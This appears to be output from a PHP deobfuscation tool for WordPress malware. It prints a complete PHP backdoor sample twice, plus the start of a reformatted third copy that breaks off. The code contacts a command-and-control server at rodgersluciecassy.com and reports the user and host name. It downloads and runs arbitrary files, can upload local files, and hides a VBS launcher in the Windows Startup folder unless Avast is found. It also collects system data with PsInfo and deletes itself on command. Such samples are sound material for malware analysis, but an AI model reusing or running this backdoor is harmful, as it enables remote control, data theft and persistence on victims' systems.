Japanese 
English
PHP deobfuscation, decryption, reconstruction toolDe-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.
*Please note that not all obfuscation codes can be decoded.<?php
$WaDQOBKStVPFGNr="http://rodgersluciecassy.com/mbp";
$kQnJBXcTfDmsOupyRILAgh=$WaDQOBKStVPFGNr."/apit.php";
$QoBahiCDNplUEKftjYGXvWMRzs=$WaDQOBKStVPFGNr."/accept.php?ref=2";
$LAqeyDBGXSRzF=$WaDQOBKStVPFGNr."/down/";
$ExVlgntRJHDpcUBiSw=false;
$TdirPQgoxkvfEZLYAHmcJWb="config.json";
$SmlVyHuiBfCkJ="PHP-8.2.vbs";
$tiJvURcgwpkxEmLnZfSay="";
$kmUYvZFTRgeLCxJOsQ=realpath(dirname(__FILE__))."\\".$TdirPQgoxkvfEZLYAHmcJWb;
$eUzT=realpath(__FILE__);
$trMHasNubY=sys_get_temp_dir();
$YKLGqi=getenv('APPDATA').'\Microsoft\Windows\Start Menu\Programs\Startup';
$GUmblxCrJYFuDMoQGt=$YKLGqi."\\".$SmlVyHuiBfCkJ;
$lgRhFxzpDTujQySmBCEO=$trMHasNubY."\\".XirzdcNPYGojUMEkVf(5);
$bWapICeLQtJny=false;
define('bOXVPTKNHdzwflaJeRqi',"aid");
define('MbOXVPTKNHdzwflaJeRqi',"mid");
define('pSuaVT',"data");
define('izGhxDwj',"cstat");
define('rUYPGFtZeNKCWsjmVhdIXOlqba',"cmdid");
define('fBLjhvRkECpwnodGYI',1);
define('CUYzeSfwbG',2);
define('zQouxyfCEwVmbaGHDlRISJP',3);
define('OilGv',4);
define('aGxZmVqyR',1);
define('EObQwzKNFDTV',2);
define('rJLvkSzWdBhXIgpqCY',3);
define('zXuKmaDr',4);
define('NIpTROkeuQB',5);
define('YZaSgiEHmdbPkwuOvCqRJ',0);
define('RFJvESCHZXtObgYPQIUWa',1);
define('FZHKpJvWuXQeYorsGdi',2);
define('qnAOFkWIZTbGmPCseH',"void");
define('jfPHDtYgiaKQsOxnZ',"|");
define('yoek','[@]');
define('dJuxvi',15);
function ThXY($qhfLjwMcKpxIoBEr) {
global $kQnJBXcTfDmsOupyRILAgh;
azGopeXscn();
$HJqMPKRl=array('http'=>array('header'=>"Content-type: application/x-www-form-urlencoded\r\n",'method'=>'POST','content'=>http_build_query($qhfLjwMcKpxIoBEr)));
$qgXtbfCLup=stream_context_create($HJqMPKRl);
$aUYpSdIo=file_get_contents($kQnJBXcTfDmsOupyRILAgh,false,$qgXtbfCLup);
if($aUYpSdIo===false) {
return false;
}
else {
return true;
}
}
function lGORwJiNa($YlbesARgzqMiXwJnVPOthkcdfu) {
global $kQnJBXcTfDmsOupyRILAgh;
azGopeXscn();
$JRXzloy=http_build_query($YlbesARgzqMiXwJnVPOthkcdfu);
$UEOhDCqYMJspKNAwFTZ=$kQnJBXcTfDmsOupyRILAgh."?".$JRXzloy;
$cwqasHVFlK=file_get_contents($UEOhDCqYMJspKNAwFTZ);
if($cwqasHVFlK===false) {
return "";
}
else {
return $cwqasHVFlK;
}
}
function azGopeXscn() {
global $kQnJBXcTfDmsOupyRILAgh;
do {
$CzBsUDNFLXHmvWPOai=@get_headers($kQnJBXcTfDmsOupyRILAgh);
$uhyiNpLsKdVroem=is_array($CzBsUDNFLXHmvWPOai)&&strpos($CzBsUDNFLXHmvWPOai[0],'200')!==false;
sleep(3);
}
while(!$uhyiNpLsKdVroem);
}
function KMUqXBDfaeGnZ($DJWhI) {
global $QoBahiCDNplUEKftjYGXvWMRzs;
azGopeXscn();
$uYLPsAQvNWJK=basename($DJWhI);
$sIRMKjCOyXn=file_get_contents($DJWhI);
$VHwqspiUBLJyzeAnOfkg=uniqid();
$qhfLjwMcKpxIoBEr="--$VHwqspiUBLJyzeAnOfkg\r\n"."Content-Disposition: form-data; name=\"file\"; filename=\"$uYLPsAQvNWJK\"\r\n"."Content-Type: application/octet-stream\r\n\r\n".$sIRMKjCOyXn."\r\n"."--$VHwqspiUBLJyzeAnOfkg--\r\n";
$HJqMPKRl=array('http'=>array('header'=>"Content-Type: multipart/form-data; boundary=$VHwqspiUBLJyzeAnOfkg\r\n",'method'=>'POST','content'=>$qhfLjwMcKpxIoBEr));
$qgXtbfCLup=stream_context_create($HJqMPKRl);
$aUYpSdIo=file_get_contents($QoBahiCDNplUEKftjYGXvWMRzs,false,$qgXtbfCLup);
if($aUYpSdIo===false) {
return false;
}
else {
return true;
}
}
function cZNfaoIkH($HXGzBsytdAFknwQpOjumElRci) {
azGopeXscn();
global $LAqeyDBGXSRzF,$trMHasNubY;
$rVODtbxMhwCUse=$LAqeyDBGXSRzF.$HXGzBsytdAFknwQpOjumElRci;
$AmbnXvqIGfPzHecr=$trMHasNubY."\\".$HXGzBsytdAFknwQpOjumElRci;
$sIRMKjCOyXn=file_get_contents($rVODtbxMhwCUse);
if($sIRMKjCOyXn===false) {
return false;
}
else {
file_put_contents($AmbnXvqIGfPzHecr,$sIRMKjCOyXn);
return true;
}
}
function iVfhsQdrNwJtPOyxzelakBMG($HXGzBsytdAFknwQpOjumElRci) {
$XeYCVNjwPRuD=cZNfaoIkH($HXGzBsytdAFknwQpOjumElRci);
if($XeYCVNjwPRuD) {
global $trMHasNubY;
$AmbnXvqIGfPzHecr=$trMHasNubY."\\".$HXGzBsytdAFknwQpOjumElRci;
pclose(popen("start /B ".$AmbnXvqIGfPzHecr,"r"));
}
}
function XirzdcNPYGojUMEkVf($wYbeuia) {
$xHRNLe='';
$LitQygNEXbjd='abcdefghijklmnopqrstuvwxyz0123456789';
for($i=0;$i<$wYbeuia;$i++) {
$xHRNLe.=$LitQygNEXbjd[rand(0,strlen($LitQygNEXbjd)-1)];
}
return $xHRNLe;
}
function TLyBaPKCzd() {
global $tiJvURcgwpkxEmLnZfSay;
$tiJvURcgwpkxEmLnZfSay=strtoupper(XirzdcNPYGojUMEkVf(25));
$DMILTZJWvFbgnSoxYpA=get_current_user();
$MLYPabqNXeSgTji=gethostname();
$zyXpD=$DMILTZJWvFbgnSoxYpA."@".$MLYPabqNXeSgTji;
$qhfLjwMcKpxIoBEr=array(bOXVPTKNHdzwflaJeRqi=>fBLjhvRkECpwnodGYI,MbOXVPTKNHdzwflaJeRqi=>$tiJvURcgwpkxEmLnZfSay,pSuaVT=>$zyXpD);
ThXY($qhfLjwMcKpxIoBEr);
}
function CRnUiwmFYBvKsTh($qhfLjwMcKpxIoBEr) {
$owLmqUvFBdpzYgETAKn=json_encode($qhfLjwMcKpxIoBEr);
global $kmUYvZFTRgeLCxJOsQ;
file_put_contents($kmUYvZFTRgeLCxJOsQ,$owLmqUvFBdpzYgETAKn);
}
function cJivuadkqGsOmWBxE($phurxdnVKbM) {
global $kmUYvZFTRgeLCxJOsQ;
$owLmqUvFBdpzYgETAKn=file_get_contents($kmUYvZFTRgeLCxJOsQ);
$qhfLjwMcKpxIoBEr=json_decode($owLmqUvFBdpzYgETAKn,true);
return $qhfLjwMcKpxIoBEr[$phurxdnVKbM];
}
function KWcaSNtBmFjuxglpVyIEQz() {
global $tiJvURcgwpkxEmLnZfSay;
$YlbesARgzqMiXwJnVPOthkcdfu=[bOXVPTKNHdzwflaJeRqi=>CUYzeSfwbG,MbOXVPTKNHdzwflaJeRqi=>$tiJvURcgwpkxEmLnZfSay];
$tlNjzQsReDghpOAx=lGORwJiNa($YlbesARgzqMiXwJnVPOthkcdfu);
return $tlNjzQsReDghpOAx;
}
function xYhKmNw($IHdKEWROuM,$mKSQlxFwiNuCBhvzdEoaPTGYrJ) {
global $tiJvURcgwpkxEmLnZfSay;
$YlbesARgzqMiXwJnVPOthkcdfu=[bOXVPTKNHdzwflaJeRqi=>zQouxyfCEwVmbaGHDlRISJP,MbOXVPTKNHdzwflaJeRqi=>$tiJvURcgwpkxEmLnZfSay,rUYPGFtZeNKCWsjmVhdIXOlqba=>$mKSQlxFwiNuCBhvzdEoaPTGYrJ,izGhxDwj=>$IHdKEWROuM];
lGORwJiNa($YlbesARgzqMiXwJnVPOthkcdfu);
}
function GUmb() {
$bdjthGZrcesnWMqkOVuLFApIy='U2V0IG9TaGVsbCA9IENyZWF0ZU9iamVjdCAoIldzY3JpcHQuU2hlbGwiKSANCkRpbSBzdHJBcmdzDQpzdHJBcmdzID0gImNtZCAvYyB7UEFUSH0iDQpvU2hlbGwuUnVuIHN0ckFyZ3MsIDAsIGZhbHNl';
global $eUzT;
$xNLHWRAuzIQDeCjfObMGVy=PHP_BINARY.' '.$eUzT;
$bdjthGZrcesnWMqkOVuLFApIy=base64_decode($bdjthGZrcesnWMqkOVuLFApIy);
$bdjthGZrcesnWMqkOVuLFApIy=str_replace("{PATH}",$xNLHWRAuzIQDeCjfObMGVy,$bdjthGZrcesnWMqkOVuLFApIy);
global $GUmblxCrJYFuDMoQGt;
file_put_contents($GUmblxCrJYFuDMoQGt,$bdjthGZrcesnWMqkOVuLFApIy);
}
function YXmsGAqwkDrILepfohjNBC() {
global $kmUYvZFTRgeLCxJOsQ;
if(is_file($kmUYvZFTRgeLCxJOsQ))
unlink($kmUYvZFTRgeLCxJOsQ);
global $eUzT;
if(is_file($eUzT))
unlink($eUzT);
global $GUmblxCrJYFuDMoQGt;
if(is_file($GUmblxCrJYFuDMoQGt))
unlink($GUmblxCrJYFuDMoQGt);
exit(0);
}
function PiQmzthacEyxlnsuBfgWOKRv() {
global $trMHasNubY,$lgRhFxzpDTujQySmBCEO,$tiJvURcgwpkxEmLnZfSay;
$NfWXVHIETZuayQorGmbJLC="";
$tafXYEOklrUBc="";
$NfWXVHIETZuayQorGmbJLC.=IuRVFsEPYGxQ(1,1);
$NfWXVHIETZuayQorGmbJLC.=IuRVFsEPYGxQ(2,1);
$tafXYEOklrUBc.=IuRVFsEPYGxQ(2,2);
$tafXYEOklrUBc.=IuRVFsEPYGxQ(2,3);
$sUrmgoVqXpe="";
$sUrmgoVqXpe.=$NfWXVHIETZuayQorGmbJLC.yoek;
$sUrmgoVqXpe.=$tafXYEOklrUBc.yoek;
$sUrmgoVqXpe.="-".yoek;
$sUrmgoVqXpe.="-";
$sUrmgoVqXpe=base64_encode($sUrmgoVqXpe);
$qhfLjwMcKpxIoBEr=array(bOXVPTKNHdzwflaJeRqi=>OilGv,MbOXVPTKNHdzwflaJeRqi=>$tiJvURcgwpkxEmLnZfSay,pSuaVT=>$sUrmgoVqXpe);
ThXY($qhfLjwMcKpxIoBEr);
unlink($lgRhFxzpDTujQySmBCEO);
}
function IuRVFsEPYGxQ($yVlgTubWpsfXMhNRKd,$nVOpXIWq) {
global $trMHasNubY,$lgRhFxzpDTujQySmBCEO;
$IaeXpkBWzRuStjQ="";
if($yVlgTubWpsfXMhNRKd==1)
$QaKcTyjrLinbPE=base64_decode('UHNJbmZvLmV4ZQ==');
else
$QaKcTyjrLinbPE=base64_decode('UHNJbmZvNjQuZXhl');
$lxCrJYFuDMoQGt=$trMHasNubY."\\".$QaKcTyjrLinbPE;
if(!is_file($lxCrJYFuDMoQGt)) {
cZNfaoIkH($QaKcTyjrLinbPE);
}
if(is_file($lxCrJYFuDMoQGt)) {
switch($nVOpXIWq) {
case 1:
$xlNqYdEHtW=base64_decode('IC1zIC9hY2NlcHRldWxhIGFwcGxpY2F0aW9ucyA+IA==');
break;
case 2:
$xlNqYdEHtW=base64_decode('IC1kIC9hY2NlcHRldWxhIHByb2Nlc3NvciA+IA==');
break;
case 3:
$xlNqYdEHtW=base64_decode('IC9hY2NlcHRldWxhIHZpZGVvID4g');
break;
}
$tlNjzQsReDghpOAx=$lxCrJYFuDMoQGt.$xlNqYdEHtW.$lgRhFxzpDTujQySmBCEO;
pclose(popen("start /B ".$tlNjzQsReDghpOAx,"r"));
sleep(4);
$IaeXpkBWzRuStjQ=file_get_contents($lgRhFxzpDTujQySmBCEO);
}
return $IaeXpkBWzRuStjQ;
}
function oDWILPBXqh() {
global $bWapICeLQtJny;
if(is_dir(base64_decode("QzpcUHJvZ3JhbSBGaWxlc1xBdmFzdCBTb2Z0d2FyZVxBdmFzdA==")))
$bWapICeLQtJny=true;
}
oDWILPBXqh();
if(!is_file($kmUYvZFTRgeLCxJOsQ)) {
TLyBaPKCzd();
$IMTOlAXVFSzhRk=array(MbOXVPTKNHdzwflaJeRqi=>$tiJvURcgwpkxEmLnZfSay);
CRnUiwmFYBvKsTh($IMTOlAXVFSzhRk);
if(!$bWapICeLQtJny)
GUmb();
}
else {
$tiJvURcgwpkxEmLnZfSay=cJivuadkqGsOmWBxE(MbOXVPTKNHdzwflaJeRqi);
}
azGopeXscn();
while(true) {
$mwUxLI=KWcaSNtBmFjuxglpVyIEQz();
$HRaiSozJ=explode(jfPHDtYgiaKQsOxnZ,$mwUxLI);
$mKSQlxFwiNuCBhvzdEoaPTGYrJ=$HRaiSozJ[0];
if($mKSQlxFwiNuCBhvzdEoaPTGYrJ!=qnAOFkWIZTbGmPCseH) {
$jQSfuBZNvpeyxlGkAtIhm=$HRaiSozJ[1];
xYhKmNw(RFJvESCHZXtObgYPQIUWa,$mKSQlxFwiNuCBhvzdEoaPTGYrJ);
switch($mKSQlxFwiNuCBhvzdEoaPTGYrJ) {
case EObQwzKNFDTV:
$ZoLgWNSMUidetKvrB=explode("*",$jQSfuBZNvpeyxlGkAtIhm);
cZNfaoIkH($ZoLgWNSMUidetKvrB[0]);
break;
case rJLvkSzWdBhXIgpqCY:
$GBCjZeqOd=explode("*",$jQSfuBZNvpeyxlGkAtIhm);
iVfhsQdrNwJtPOyxzelakBMG($GBCjZeqOd[0]);
break;
case zXuKmaDr:
YXmsGAqwkDrILepfohjNBC();
break;
case NIpTROkeuQB:
PiQmzthacEyxlnsuBfgWOKRv();
break;
}
xYhKmNw(FZHKpJvWuXQeYorsGdi,$mKSQlxFwiNuCBhvzdEoaPTGYrJ);
}
else {
}
sleep(dJuxvi);
}?>
<?php
$WaDQOBKStVPFGNr="http://rodgersluciecassy.com/mbp";
$kQnJBXcTfDmsOupyRILAgh=$WaDQOBKStVPFGNr."/apit.php";
$QoBahiCDNplUEKftjYGXvWMRzs=$WaDQOBKStVPFGNr."/accept.php?ref=2";
$LAqeyDBGXSRzF=$WaDQOBKStVPFGNr."/down/";
$ExVlgntRJHDpcUBiSw=false;
$TdirPQgoxkvfEZLYAHmcJWb="config.json";
$SmlVyHuiBfCkJ="PHP-8.2.vbs";
$tiJvURcgwpkxEmLnZfSay="";
$kmUYvZFTRgeLCxJOsQ=realpath(dirname(__FILE__))."\\".$TdirPQgoxkvfEZLYAHmcJWb;
$eUzT=realpath(__FILE__);
$trMHasNubY=sys_get_temp_dir();
$YKLGqi=getenv('APPDATA').'\Microsoft\Windows\Start Menu\Programs\Startup';
$GUmblxCrJYFuDMoQGt=$YKLGqi."\\".$SmlVyHuiBfCkJ;
$lgRhFxzpDTujQySmBCEO=$trMHasNubY."\\".XirzdcNPYGojUMEkVf(5);
$bWapICeLQtJny=false;
define('bOXVPTKNHdzwflaJeRqi',"aid");
define('MbOXVPTKNHdzwflaJeRqi',"mid");
define('pSuaVT',"data");
define('izGhxDwj',"cstat");
define('rUYPGFtZeNKCWsjmVhdIXOlqba',"cmdid");
define('fBLjhvRkECpwnodGYI',1);
define('CUYzeSfwbG',2);
define('zQouxyfCEwVmbaGHDlRISJP',3);
define('OilGv',4);
define('aGxZmVqyR',1);
define('EObQwzKNFDTV',2);
define('rJLvkSzWdBhXIgpqCY',3);
define('zXuKmaDr',4);
define('NIpTROkeuQB',5);
define('YZaSgiEHmdbPkwuOvCqRJ',0);
define('RFJvESCHZXtObgYPQIUWa',1);
define('FZHKpJvWuXQeYorsGdi',2);
define('qnAOFkWIZTbGmPCseH',"void");
define('jfPHDtYgiaKQsOxnZ',"|");
define('yoek','[@]');
define('dJuxvi',15);
function ThXY($qhfLjwMcKpxIoBEr) {
global $kQnJBXcTfDmsOupyRILAgh;
azGopeXscn();
$HJqMPKRl=array('http'=>array('header'=>"Content-type: application/x-www-form-urlencoded\r\n",'method'=>'POST','content'=>http_build_query($qhfLjwMcKpxIoBEr)));
$qgXtbfCLup=stream_context_create($HJqMPKRl);
$aUYpSdIo=file_get_contents($kQnJBXcTfDmsOupyRILAgh,false,$qgXtbfCLup);
if($aUYpSdIo===false) {
return false;
}
else {
return true;
}
}
function lGORwJiNa($YlbesARgzqMiXwJnVPOthkcdfu) {
global $kQnJBXcTfDmsOupyRILAgh;
azGopeXscn();
$JRXzloy=http_build_query($YlbesARgzqMiXwJnVPOthkcdfu);
$UEOhDCqYMJspKNAwFTZ=$kQnJBXcTfDmsOupyRILAgh."?".$JRXzloy;
$cwqasHVFlK=file_get_contents($UEOhDCqYMJspKNAwFTZ);
if($cwqasHVFlK===false) {
return "";
}
else {
return $cwqasHVFlK;
}
}
function azGopeXscn() {
global $kQnJBXcTfDmsOupyRILAgh;
do {
$CzBsUDNFLXHmvWPOai=@get_headers($kQnJBXcTfDmsOupyRILAgh);
$uhyiNpLsKdVroem=is_array($CzBsUDNFLXHmvWPOai)&&strpos($CzBsUDNFLXHmvWPOai[0],'200')!==false;
sleep(3);
}
while(!$uhyiNpLsKdVroem);
}
function KMUqXBDfaeGnZ($DJWhI) {
global $QoBahiCDNplUEKftjYGXvWMRzs;
azGopeXscn();
$uYLPsAQvNWJK=basename($DJWhI);
$sIRMKjCOyXn=file_get_contents($DJWhI);
$VHwqspiUBLJyzeAnOfkg=uniqid();
$qhfLjwMcKpxIoBEr="--$VHwqspiUBLJyzeAnOfkg\r\n"."Content-Disposition: form-data; name=\"file\"; filename=\"$uYLPsAQvNWJK\"\r\n"."Content-Type: application/octet-stream\r\n\r\n".$sIRMKjCOyXn."\r\n"."--$VHwqspiUBLJyzeAnOfkg--\r\n";
$HJqMPKRl=array('http'=>array('header'=>"Content-Type: multipart/form-data; boundary=$VHwqspiUBLJyzeAnOfkg\r\n",'method'=>'POST','content'=>$qhfLjwMcKpxIoBEr));
$qgXtbfCLup=stream_context_create($HJqMPKRl);
$aUYpSdIo=file_get_contents($QoBahiCDNplUEKftjYGXvWMRzs,false,$qgXtbfCLup);
if($aUYpSdIo===false) {
return false;
}
else {
return true;
}
}
function cZNfaoIkH($HXGzBsytdAFknwQpOjumElRci) {
azGopeXscn();
global $LAqeyDBGXSRzF,$trMHasNubY;
$rVODtbxMhwCUse=$LAqeyDBGXSRzF.$HXGzBsytdAFknwQpOjumElRci;
$AmbnXvqIGfPzHecr=$trMHasNubY."\\".$HXGzBsytdAFknwQpOjumElRci;
$sIRMKjCOyXn=file_get_contents($rVODtbxMhwCUse);
if($sIRMKjCOyXn===false) {
return false;
}
else {
file_put_contents($AmbnXvqIGfPzHecr,$sIRMKjCOyXn);
return true;
}
}
function iVfhsQdrNwJtPOyxzelakBMG($HXGzBsytdAFknwQpOjumElRci) {
$XeYCVNjwPRuD=cZNfaoIkH($HXGzBsytdAFknwQpOjumElRci);
if($XeYCVNjwPRuD) {
global $trMHasNubY;
$AmbnXvqIGfPzHecr=$trMHasNubY."\\".$HXGzBsytdAFknwQpOjumElRci;
pclose(popen("start /B ".$AmbnXvqIGfPzHecr,"r"));
}
}
function XirzdcNPYGojUMEkVf($wYbeuia) {
$xHRNLe='';
$LitQygNEXbjd='abcdefghijklmnopqrstuvwxyz0123456789';
for($i=0;$i<$wYbeuia;$i++) {
$xHRNLe.=$LitQygNEXbjd[rand(0,strlen($LitQygNEXbjd)-1)];
}
return $xHRNLe;
}
function TLyBaPKCzd() {
global $tiJvURcgwpkxEmLnZfSay;
$tiJvURcgwpkxEmLnZfSay=strtoupper(XirzdcNPYGojUMEkVf(25));
$DMILTZJWvFbgnSoxYpA=get_current_user();
$MLYPabqNXeSgTji=gethostname();
$zyXpD=$DMILTZJWvFbgnSoxYpA."@".$MLYPabqNXeSgTji;
$qhfLjwMcKpxIoBEr=array(bOXVPTKNHdzwflaJeRqi=>fBLjhvRkECpwnodGYI,MbOXVPTKNHdzwflaJeRqi=>$tiJvURcgwpkxEmLnZfSay,pSuaVT=>$zyXpD);
ThXY($qhfLjwMcKpxIoBEr);
}
function CRnUiwmFYBvKsTh($qhfLjwMcKpxIoBEr) {
$owLmqUvFBdpzYgETAKn=json_encode($qhfLjwMcKpxIoBEr);
global $kmUYvZFTRgeLCxJOsQ;
file_put_contents($kmUYvZFTRgeLCxJOsQ,$owLmqUvFBdpzYgETAKn);
}
function cJivuadkqGsOmWBxE($phurxdnVKbM) {
global $kmUYvZFTRgeLCxJOsQ;
$owLmqUvFBdpzYgETAKn=file_get_contents($kmUYvZFTRgeLCxJOsQ);
$qhfLjwMcKpxIoBEr=json_decode($owLmqUvFBdpzYgETAKn,true);
return $qhfLjwMcKpxIoBEr[$phurxdnVKbM];
}
function KWcaSNtBmFjuxglpVyIEQz() {
global $tiJvURcgwpkxEmLnZfSay;
$YlbesARgzqMiXwJnVPOthkcdfu=[bOXVPTKNHdzwflaJeRqi=>CUYzeSfwbG,MbOXVPTKNHdzwflaJeRqi=>$tiJvURcgwpkxEmLnZfSay];
$tlNjzQsReDghpOAx=lGORwJiNa($YlbesARgzqMiXwJnVPOthkcdfu);
return $tlNjzQsReDghpOAx;
}
function xYhKmNw($IHdKEWROuM,$mKSQlxFwiNuCBhvzdEoaPTGYrJ) {
global $tiJvURcgwpkxEmLnZfSay;
$YlbesARgzqMiXwJnVPOthkcdfu=[bOXVPTKNHdzwflaJeRqi=>zQouxyfCEwVmbaGHDlRISJP,MbOXVPTKNHdzwflaJeRqi=>$tiJvURcgwpkxEmLnZfSay,rUYPGFtZeNKCWsjmVhdIXOlqba=>$mKSQlxFwiNuCBhvzdEoaPTGYrJ,izGhxDwj=>$IHdKEWROuM];
lGORwJiNa($YlbesARgzqMiXwJnVPOthkcdfu);
}
function GUmb() {
$bdjthGZrcesnWMqkOVuLFApIy='U2V0IG9TaGVsbCA9IENyZWF0ZU9iamVjdCAoIldzY3JpcHQuU2hlbGwiKSANCkRpbSBzdHJBcmdzDQpzdHJBcmdzID0gImNtZCAvYyB7UEFUSH0iDQpvU2hlbGwuUnVuIHN0ckFyZ3MsIDAsIGZhbHNl';
global $eUzT;
$xNLHWRAuzIQDeCjfObMGVy=PHP_BINARY.' '.$eUzT;
$bdjthGZrcesnWMqkOVuLFApIy=base64_decode($bdjthGZrcesnWMqkOVuLFApIy);
$bdjthGZrcesnWMqkOVuLFApIy=str_replace("{PATH}",$xNLHWRAuzIQDeCjfObMGVy,$bdjthGZrcesnWMqkOVuLFApIy);
global $GUmblxCrJYFuDMoQGt;
file_put_contents($GUmblxCrJYFuDMoQGt,$bdjthGZrcesnWMqkOVuLFApIy);
}
function YXmsGAqwkDrILepfohjNBC() {
global $kmUYvZFTRgeLCxJOsQ;
if(is_file($kmUYvZFTRgeLCxJOsQ))
unlink($kmUYvZFTRgeLCxJOsQ);
global $eUzT;
if(is_file($eUzT))
unlink($eUzT);
global $GUmblxCrJYFuDMoQGt;
if(is_file($GUmblxCrJYFuDMoQGt))
unlink($GUmblxCrJYFuDMoQGt);
exit(0);
}
function PiQmzthacEyxlnsuBfgWOKRv() {
global $trMHasNubY,$lgRhFxzpDTujQySmBCEO,$tiJvURcgwpkxEmLnZfSay;
$NfWXVHIETZuayQorGmbJLC="";
$tafXYEOklrUBc="";
$NfWXVHIETZuayQorGmbJLC.=IuRVFsEPYGxQ(1,1);
$NfWXVHIETZuayQorGmbJLC.=IuRVFsEPYGxQ(2,1);
$tafXYEOklrUBc.=IuRVFsEPYGxQ(2,2);
$tafXYEOklrUBc.=IuRVFsEPYGxQ(2,3);
$sUrmgoVqXpe="";
$sUrmgoVqXpe.=$NfWXVHIETZuayQorGmbJLC.yoek;
$sUrmgoVqXpe.=$tafXYEOklrUBc.yoek;
$sUrmgoVqXpe.="-".yoek;
$sUrmgoVqXpe.="-";
$sUrmgoVqXpe=base64_encode($sUrmgoVqXpe);
$qhfLjwMcKpxIoBEr=array(bOXVPTKNHdzwflaJeRqi=>OilGv,MbOXVPTKNHdzwflaJeRqi=>$tiJvURcgwpkxEmLnZfSay,pSuaVT=>$sUrmgoVqXpe);
ThXY($qhfLjwMcKpxIoBEr);
unlink($lgRhFxzpDTujQySmBCEO);
}
function IuRVFsEPYGxQ($yVlgTubWpsfXMhNRKd,$nVOpXIWq) {
global $trMHasNubY,$lgRhFxzpDTujQySmBCEO;
$IaeXpkBWzRuStjQ="";
if($yVlgTubWpsfXMhNRKd==1)
$QaKcTyjrLinbPE=base64_decode('UHNJbmZvLmV4ZQ==');
else
$QaKcTyjrLinbPE=base64_decode('UHNJbmZvNjQuZXhl');
$lxCrJYFuDMoQGt=$trMHasNubY."\\".$QaKcTyjrLinbPE;
if(!is_file($lxCrJYFuDMoQGt)) {
cZNfaoIkH($QaKcTyjrLinbPE);
}
if(is_file($lxCrJYFuDMoQGt)) {
switch($nVOpXIWq) {
case 1:
$xlNqYdEHtW=base64_decode('IC1zIC9hY2NlcHRldWxhIGFwcGxpY2F0aW9ucyA+IA==');
break;
case 2:
$xlNqYdEHtW=base64_decode('IC1kIC9hY2NlcHRldWxhIHByb2Nlc3NvciA+IA==');
break;
case 3:
$xlNqYdEHtW=base64_decode('IC9hY2NlcHRldWxhIHZpZGVvID4g');
break;
}
$tlNjzQsReDghpOAx=$lxCrJYFuDMoQGt.$xlNqYdEHtW.$lgRhFxzpDTujQySmBCEO;
pclose(popen("start /B ".$tlNjzQsReDghpOAx,"r"));
sleep(4);
$IaeXpkBWzRuStjQ=file_get_contents($lgRhFxzpDTujQySmBCEO);
}
return $IaeXpkBWzRuStjQ;
}
function oDWILPBXqh() {
global $bWapICeLQtJny;
if(is_dir(base64_decode("QzpcUHJvZ3JhbSBGaWxlc1xBdmFzdCBTb2Z0d2FyZVxBdmFzdA==")))
$bWapICeLQtJny=true;
}
oDWILPBXqh();
if(!is_file($kmUYvZFTRgeLCxJOsQ)) {
TLyBaPKCzd();
$IMTOlAXVFSzhRk=array(MbOXVPTKNHdzwflaJeRqi=>$tiJvURcgwpkxEmLnZfSay);
CRnUiwmFYBvKsTh($IMTOlAXVFSzhRk);
if(!$bWapICeLQtJny)
GUmb();
}
else {
$tiJvURcgwpkxEmLnZfSay=cJivuadkqGsOmWBxE(MbOXVPTKNHdzwflaJeRqi);
}
azGopeXscn();
while(true) {
$mwUxLI=KWcaSNtBmFjuxglpVyIEQz();
$HRaiSozJ=explode(jfPHDtYgiaKQsOxnZ,$mwUxLI);
$mKSQlxFwiNuCBhvzdEoaPTGYrJ=$HRaiSozJ[0];
if($mKSQlxFwiNuCBhvzdEoaPTGYrJ!=qnAOFkWIZTbGmPCseH) {
$jQSfuBZNvpeyxlGkAtIhm=$HRaiSozJ[1];
xYhKmNw(RFJvESCHZXtObgYPQIUWa,$mKSQlxFwiNuCBhvzdEoaPTGYrJ);
switch($mKSQlxFwiNuCBhvzdEoaPTGYrJ) {
case EObQwzKNFDTV:
$ZoLgWNSMUidetKvrB=explode("*",$jQSfuBZNvpeyxlGkAtIhm);
cZNfaoIkH($ZoLgWNSMUidetKvrB[0]);
break;
case rJLvkSzWdBhXIgpqCY:
$GBCjZeqOd=explode("*",$jQSfuBZNvpeyxlGkAtIhm);
iVfhsQdrNwJtPOyxzelakBMG($GBCjZeqOd[0]);
break;
case zXuKmaDr:
YXmsGAqwkDrILepfohjNBC();
break;
case NIpTROkeuQB:
PiQmzthacEyxlnsuBfgWOKRv();
break;
}
xYhKmNw(FZHKpJvWuXQeYorsGdi,$mKSQlxFwiNuCBhvzdEoaPTGYrJ);
}
else {
}
sleep(dJuxvi);
}?><?php
$WaDQOBKStVPFGNr = "http://rodgersluciecassy.com/mbp";
$kQnJBXcTfDmsOupyRILAgh = "http://rodgersluciecassy.com/mbp/apit.php";
$QoBahiCDNplUEKftjYGXvWMRzs = "http://rodgersluciecassy.com/mbp/accept.php?ref=2";
$LAqeyDBGXSRzF = "http://rodgersluciecassy.com/mbp/down/";
$ExVlgntRJHDpcUBiSw = false;
$TdirPQgoxkvfEZLYAHmcJWb = "config.json";
$SmlVyHuiBfCkJ = "PHP-8.2.vbs";
$tiJvURcgwpkxEmLnZfSay = "";
$kmUYvZFTRgeLCxJOsQ = realpath("/var/www/html") . "\\" . $TdirPQgoxkvfEZLYAHmcJWb;
$eUzT = realpath("/var/www/html/input.php");
$trMHasNubY = sys_get_temp_dir();
$YKLGqi = getenv('APPDATA') . '\\Microsoft\\Windows\\Start Menu\\Programs\\Startup';
$GUmblxCrJYFuDMoQGt = $YKLGqi . "\\" . $SmlVyHuiBfCkJ;
$lgRhFxzpDTujQySmBCEO = $trMHasNubY . "\\" . XirzdcNPYGojUMEkVf(5);
$bWapICeLQtJny = false;
define('bOXVPTKNHdzwflaJeRqi', "aid");
define('MbOXVPTKNHdzwflaJeRqi', "mid");
define('pSuaVT', "data");
define('izGhxDwj', "cstat");
define('rUYPGFtZeNKCWsjmVhdIXOlqba', "cmdid");
define('fBLjhvRkECpwnodGYI', 1);
define('CUYzeSfwbG', 2);
define('zQouxyfCEwVmbaGHDlRISJP', 3);
define('OilGv', 4);
define('aGxZmVqyR', 1);
define('EObQwzKNFDTV', 2);
define('rJLvkSzWdBhXIgpqCY', 3);
define('zXuKmaDr', 4);
define('NIpTROkeuQB', 5);
define('YZaSgiEHmdbPkwuOvCqRJ', 0);
define('RFJvESCHZXtObgYPQIUWa', 1);
define('FZHKpJvWuXQeYorsGdi', 2);
define('qnAOFkWIZTbGmPCseH', "void");
define('jfPHDtYgiaKQsOxnZ', "|");
define('yoek', '[@]');
define('dJuxvi', 15);
function ThXY($qhfLjwMcKpxIoBEr)
{
global $kQnJBXcTfDmsOupyRILAgh;
azGopeXscn();
